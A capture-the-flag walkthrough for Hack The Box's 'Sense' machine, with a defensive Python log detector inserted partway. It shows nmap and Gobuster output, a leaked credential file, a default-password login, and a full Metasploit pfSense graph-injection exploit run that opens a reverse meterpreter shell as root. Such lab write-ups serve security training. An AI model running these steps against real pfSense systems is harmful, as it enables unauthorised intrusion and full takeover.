10/07/2024

HTB: Sense

 ___  ___  _________  ________                         
|\  \|\  \|\___   ___\\   __  \  ___                   
\ \  \\\  \|___ \  \_\ \  \|\ /_|\__\                  
 \ \   __  \   \ \  \ \ \   __  \|__|                  
  \ \  \ \  \   \ \  \ \ \  \|\  \  ___                
   \ \__\ \__\   \ \__\ \ \_______\|\__\               
    \|__|\|__|    \|__|  \|_______|\|__|               
 ________  _______   ________   ________  _______      
|\   ____\|\  ___ \ |\   ___  \|\   ____\|\  ___ \     
\ \  \___|\ \   __/|\ \  \\ \  \ \  \___|\ \   __/|    
 \ \_____  \ \  \_|/_\ \  \\ \  \ \_____  \ \  \_|/__  
  \|____|\  \ \  \_|\ \ \  \\ \  \|____|\  \ \  \_|\ \ 
    ____\_\  \ \_______\ \__\\ \__\____\_\  \ \_______\
   |\_________\|_______|\|__| \|__|\_________\|_______|
   \|_________|                   \|_________|         
                                                            

Hack The Box's Sense is an Easy OpenBSD machine that features pfSense, an open-source firewall software. This machine uses basic directory brute-forcing with Gobuster to find a text file of user credentials and gain access to the firewall, followed by an injection attack to gain root access to the machine.

After starting the machine on HTB and connecting to your HTB VPN, we will begin by opening our terminal and pinging the machine's IP address to make sure the network is up. Make sure the IP address you enter matches the one displayed on HTB when you boot up the target machine.

ping 10.10.10.60

You should receive responses from the IP address. You can press CTRL + C to stop sending packets to the target host. Once confirming the network is up and running, it's time to move to enumeration using Nmap.

Start by doing a quick service scan using Nmap. We will use the -sV switch to enable version detection. You can learn more about Nmap here.

nmap -sV 10.10.10.60
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-02 11:17 CDT
Nmap scan report for 10.10.10.60
Host is up (0.0091s latency).
Not shown: 998 filtered tcp ports (no-response)
PORT    STATE SERVICE    VERSION
80/tcp  open  http       lighttpd 1.4.35
443/tcp open  ssl/https?

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 10.98 seconds

We can see a web server running. Let's navigate to the site by entering the target's IP address in our web browser. Upon inspection we see a login page for pfSense, an open-source firewall based on FreeBSD. A quick Google search for the default pfSense credentials shows the default username is "admin" and the password is "pfsense". When we try these default credentials, we are told they are not correct. Let's move on to using Gobuster to brute-force directories on the server. We'll search for .php and .txt files using the directory-list-2.3-medium.txt wordlist.

gobuster dir -u https://10.10.10.60/ -t 50 -x php,txt -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -k
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     https://10.10.10.60/
[+] Method:                  GET
[+] Threads:                 50
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              php,txt
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/index.php            (Status: 200) [Size: 6690]
/help.php             (Status: 200) [Size: 6689]
/themes               (Status: 301) [Size: 0] [--> https://10.10.10.60/themes/]
/stats.php            (Status: 200) [Size: 6690]
/css                  (Status: 301) [Size: 0] [--> https://10.10.10.60/css/]
/edit.php             (Status: 200) [Size: 6689]
/includes             (Status: 301) [Size: 0] [--> https://10.10.10.60/includes/]
/license.php          (Status: 200) [Size: 6692]
/system.php           (Status: 200) [Size: 6691]
/status.php           (Status: 200) [Size: 6691]
/javascript           (Status: 301) [Size: 0] [--> https://10.10.10.60/javascript/]
/changelog.txt        (Status: 200) [Size: 271]
/classes              (Status: 301) [Size: 0] [--> https://10.10.10.60/classes/]
/exec.php             (Status: 200) [Size: 6689]
/widgets              (Status: 301) [Size: 0] [--> https://10.10.10.60/widgets/]
/graph.php            (Status: 200) [Size: 6690]
/tree                 (Status: 301) [Size: 0] [--> https://10.10.10.60/tree/]
/wizard.php           (Status: 200) [Size: 6691]
/shortcuts            (Status: 301) [Size: 0] [--> https://10.10.10.60/shortcuts/]
/pkg.php              (Status: 200) [Size: 6688]
/installer            (Status: 301) [Size: 0] [--> https://10.10.10.60/installer/]
/wizards              (Status: 301) [Size: 0] [--> https://10.10.10.60/wizards/]
/xmlrpc.php           (Status: 200) [Size: 384]
/reboot.php           (Status: 200) [Size: 6691]
/interfaces.php       (Status: 200) [Size: 6695]
/csrf                 (Status: 301) [Size: 0] [--> https://10.10.10.60/csrf/]
/system-users.txt     (Status: 200) [Size: 106]
/filebrowser          (Status: 301) [Size: 0] [--> https://10.10.10.60/filebrowser/]

After some time, we will notice /system-users.txt in the results above. This file is interesting because it could contain user login information. We can view it by navigating to the path on the web server in our browser; on my spawned HTB machine that is https://10.10.10.60/system-users.txt. We get the following page with a support ticket containing credentials:

####Support ticket###

Please create the following user


username: Rohit
password: company defaults

We see the username listed as "Rohit" and the password as "company defaults". After testing these credentials on the pfSense login page, we see we are not granted access. But let's try the username with the default pfSense password, "pfsense". With these credentials we are granted access!
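From the defender's side, the Gobuster run above leaves a distinctive trace in the firewall's lighttpd access log: a burst of 404s from one client, followed by a 200 on the credential file. The following Python, added here as an example and not part of the original writeup, parses Common Log Format lines and flags that pattern; the sensitive-path watchlist and the sample log lines are constructed for the example.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Common Log Format, as lighttpd's default accesslog.format writes it.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<m>\S+) '
                    r'(?P<path>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)')
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"
# Assumed watchlist: files a pfSense host should never hand out; the
# credential file from the writeup is the obvious entry.
SENSITIVE = {"/system-users.txt"}

def parse(line):
    m = LOG_RE.match(line)
    return None if not m else {"ip": m["ip"], "path": m["path"],
                               "status": int(m["status"]),
                               "ts": datetime.strptime(m["ts"], TS_FMT)}

def detect_bruteforce(lines, window=timedelta(seconds=60), threshold=20):
    """Flag clients with >= threshold 404s inside any `window`, or a 200 on a
    sensitive path. Returns {ip: {"peak_404s": n, "sensitive_hits": [...]}}."""
    by_ip = defaultdict(list)
    for rec in filter(None, map(parse, lines)):
        by_ip[rec["ip"]].append(rec)
    findings = {}
    for ip, recs in by_ip.items():
        misses = sorted(r["ts"] for r in recs if r["status"] == 404)
        peak = start = 0
        for end in range(len(misses)):          # sliding window over the 404s
            while misses[end] - misses[start] > window:
                start += 1
            peak = max(peak, end - start + 1)
        hits = sorted({r["path"] for r in recs
                       if r["status"] == 200 and r["path"] in SENSITIVE})
        if peak >= threshold or hits:
            findings[ip] = {"peak_404s": peak, "sensitive_hits": hits}
    return findings

# Constructed sample log: 25 misses inside ten seconds and the credential-file
# hit from one client, plus two ordinary requests from an administrator.
def _line(ip, sec, path, status, size):
    return (f'{ip} - - [02/Oct/2024:11:30:{sec:02d} -0500] '
            f'"GET {path} HTTP/1.1" {status} {size}')

SAMPLE_LOG = [_line("10.10.14.6", i % 10, f"/w{i}.php", 404, 0) for i in range(25)]
SAMPLE_LOG.append(_line("10.10.14.6", 11, "/system-users.txt", 200, 106))
SAMPLE_LOG += [_line("192.168.1.5", 5, "/index.php", 200, 6690),
               _line("192.168.1.5", 40, "/status.php", 200, 6691)]
```

Running detect_bruteforce(SAMPLE_LOG) flags only 10.10.14.6, with a peak of 25 misses in the window and the hit on /system-users.txt; the administrator's traffic is not reported.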

Let's fire up Metasploit and search for potential exploits for pfSense:

msfconsole
Metasploit tip: To save all commands executed since start up to a file, use the 
makerc command
                                                  
 _                                                    _
/ \    /\         __                         _   __  /_/ __
| |\  / | _____   \ \           ___   _____ | | /  \ _   \ \
| | \/| | | ___\ |- -|   /\    / __\ | -__/ | || | || | |- -|
|_|   | | | _|__  | |_  / -\ __\ \   | |    | | \__/| |  | |_
      |/  |____/  \___\/ /\ \\___/   \/     \__|    |_\  \___\


       =[ metasploit v6.3.44-dev                          ]
+ -- --=[ 2376 exploits - 1232 auxiliary - 416 post       ]
+ -- --=[ 1391 payloads - 46 encoders - 11 nops           ]
+ -- --=[ 9 evasion                                       ]

Metasploit Documentation: https://docs.metasploit.com/

[msf](Jobs:0 Agents:0) >> search pfsense

Matching Modules
================

   #  Name                                            Disclosure Date  Rank       Check  Description
   -  ----                                            ---------------  ----       -----  -----------
   0  exploit/unix/http/pfsense_clickjacking          2017-11-21       normal     No     Clickjacking Vulnerability In CSRF Error Page pfSense
   1  exploit/unix/http/pfsense_diag_routes_webshell  2022-02-23       excellent  Yes    pfSense Diag Routes Web Shell Upload
   2  exploit/unix/http/pfsense_config_data_exec      2023-03-18       excellent  Yes    pfSense Restore RRD Data Command Injection
   3  exploit/unix/http/pfsense_graph_injection_exec  2016-04-18       excellent  No     pfSense authenticated graph status RCE
   4  exploit/unix/http/pfsense_group_member_exec     2017-11-06       excellent  Yes    pfSense authenticated group member RCE
   5  exploit/unix/http/pfsense_pfblockerng_webshell  2022-09-05       great      Yes    pfSense plugin pfBlockerNG unauthenticated RCE as root


Interact with a module by name or index. For example info 5, use 5 or use exploit/unix/http/pfsense_pfblockerng_webshell

[msf](Jobs:0 Agents:0) >> 

We see option #3 is a module for an authenticated injection attack (pfSense authenticated graph status RCE); it needs valid credentials, which we now have. You can read more about this specific exploit on Rapid7's website here. Let's select this module and fill out the required exploit options:

use 3
[*] Using configured payload php/meterpreter/reverse_tcp
[msf](Jobs:0 Agents:0) exploit(unix/http/pfsense_graph_injection_exec) >> options

Module options (exploit/unix/http/pfsense_graph_injection_exec):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   PASSWORD  pfsense          yes       Password to login with
   Proxies                    no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                     yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit
                                        /basics/using-metasploit.html
   RPORT     443              yes       The target port (TCP)
   SSL       true             no        Negotiate SSL/TLS for outgoing connections
   USERNAME  admin            yes       User to login with
   VHOST                      no        HTTP server virtual host


Payload options (php/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic Target



View the full module info with the info, or info -d command.

[msf](Jobs:0 Agents:0) exploit(unix/http/pfsense_graph_injection_exec) >> set RHOSTS 10.10.10.60
RHOSTS => 10.10.10.60
[msf](Jobs:0 Agents:0) exploit(unix/http/pfsense_graph_injection_exec) >> set USERNAME rohit
USERNAME => rohit
[msf](Jobs:0 Agents:0) exploit(unix/http/pfsense_graph_injection_exec) >> set LHOST tun0
LHOST => 10.10.14.6
[msf](Jobs:0 Agents:0) exploit(unix/http/pfsense_graph_injection_exec) >> 

We set RHOSTS to the target IP address, USERNAME to "rohit", and LHOST to our listening address for the reverse TCP connection (giving the tun0 interface resolves it to our VPN address). We can now run the exploit using "exploit":

exploit

[*] Started reverse TCP handler on 10.10.14.6:4444 
[*] Detected pfSense 2.1.3-RELEASE, uploading intial payload
[*] Payload uploaded successfully, executing
[*] Sending stage (39927 bytes) to 10.10.10.60
[+] Deleted uz
[*] Meterpreter session 1 opened (10.10.14.6:4444 -> 10.10.10.60:53021) at 2024-10-02 12:06:53 -0500

(Meterpreter 1)(/var/db/rrd) > getuid
Server username: root
(Meterpreter 1)(/var/db/rrd) > 

Once the reverse TCP connection is established, the "getuid" command shows we now have root access to the machine! You can now navigate through the target system to obtain the user and root .txt flags.